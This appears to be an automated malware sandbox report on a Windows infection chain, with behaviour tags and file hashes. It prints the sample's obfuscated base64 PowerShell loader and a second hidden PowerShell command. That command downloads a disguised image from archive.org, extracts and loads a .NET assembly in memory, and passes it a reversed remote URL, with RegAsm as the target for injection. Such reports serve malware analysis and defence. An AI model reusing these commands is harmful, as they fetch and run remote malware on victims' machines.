⫟J□ ⿉ ㋃ ⼏ ⫟Bs□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟YQBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BB□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟cwBl□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YgBs□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟WwBT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟FI□ ⿉ ㋃ ⼏ ⫟ZQBm□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟ZQBj□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQBv□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟LgBB□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟cwBl□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YgBs□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟XQ□ ⿉ ㋃ ⼏ ⫟6□ ⿉ ㋃ ⼏ ⫟Do□ ⿉ ㋃ ⼏ ⫟T□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BC□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟B5□ ⿉ ㋃ ⼏ ⫟H□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟bwBh□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQBk□ ⿉ ㋃ ⼏ ⫟EE□ ⿉ ㋃ ⼏ ⫟cwBz□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQBi□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟eQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ec□ ⿉ ㋃ ⼏ ⫟ZQB0□ ⿉ ㋃ ⼏ ⫟FQ□ ⿉ ㋃ ⼏ ⫟eQBw□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟bgBs□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟Yg□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟Tw□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Eg□ ⿉ ㋃ ⼏ ⫟bwBt□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟Jw□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bt□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟eQBw□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟LgBH□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BN□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟VgBB□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟Jw□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟HY□ ⿉ ㋃ ⼏ ⫟bwBr□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟dQBs□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟Fs□ ⿉ ㋃ ⼏ ⫟bwBi□ ⿉ ㋃ ⼏ ⫟Go□ ⿉ ㋃ ⼏ ⫟ZQBj□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟WwBd□ ⿉ ㋃ ⼏ ⫟F0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟B4□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟LgBD□ ⿉ ㋃ ⼏ ⫟FY□ ⿉ ㋃ ⼏ ⫟RQBX□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟TwBN□ ⿉ ㋃ ⼏ ⫟E8□ ⿉ ㋃ ⼏ ⫟R□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟H□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟c□ ⿉ ㋃ ⼏ ⫟Bt□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟DE□ ⿉ ㋃ ⼏ ⫟MQ□ ⿉ ㋃ ⼏ ⫟x□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟M□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟DE□ ⿉ ㋃ ⼏ ⫟Lg□ ⿉ ㋃ ⼏ ⫟x□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟MQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟OQ□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟OgBw□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟s□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟cwBh□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQB2□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟s□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟cwBh□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQB2□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟s□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟cwBh□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟aQB2□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟FI□ ⿉ ㋃ ⼏ ⫟ZQBn□ ⿉ ㋃ ⼏ ⫟EE□ ⿉ ㋃ ⼏ ⫟cwBt□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('□ ⿉ ㋃ ⼏ ⫟','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CVEW/OMOD/ppmax/111.021.141.49//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4116,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4448 /prefetch:81⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
1.1MB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB